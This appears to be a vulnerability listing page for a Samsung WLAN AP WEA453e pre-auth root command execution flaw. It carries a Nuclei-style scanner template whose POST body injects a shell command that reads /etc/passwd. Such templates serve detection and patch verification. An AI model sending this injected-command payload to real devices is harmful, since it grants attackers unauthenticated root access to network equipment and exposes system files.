samsung-wlan-ap-rce: Samsung WLAN AP WEA453e - Remote Code Execution

日期: 2025-08-01 | 影响软件: Samsung WLAN AP | POC: 已公开

漏洞描述

Samsung WLAN AP WEA453e is vulnerable to a pre-auth root remote command execution vulnerability, which means an attacker could run code as root remotely without logging in.

PoC代码[已公开]

id: samsung-wlan-ap-rce

info:
  name: Samsung WLAN AP WEA453e - Remote Code Execution
  author: pikpikcu
  severity: critical
  description: Samsung WLAN AP WEA453e is vulnerable to a pre-auth root remote command execution vulnerability, which means an attacker could run code as root remotely without logging in.
  reference:
    - https://omriinbar.medium.com/samsung-wlan-ap-wea453e-vulnerabilities-7aa4a57d4dba
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cwe-id: CWE-77
  metadata:
    max-request: 1
  tags: xss,samsung,rce,vuln

http:
  - method: POST
    path:
      - "{{BaseURL}}/(download)/tmp/poc.txt"

    body: "command1=shell%3Acat /etc/passwd|dd of=/tmp/poc.txt"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"
          - "bin:.*:1:1"
        part: body

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100af9d05783638f7bcce26358942a7b61354110c4387be48303231f84925b6fc980221009f1f96d14d4b7138d4ec4d800b483d83568ea9bdbd4fd03e1d26fd9326a21e25:922c64590222798bb761d5b6d8e72950

相关漏洞推荐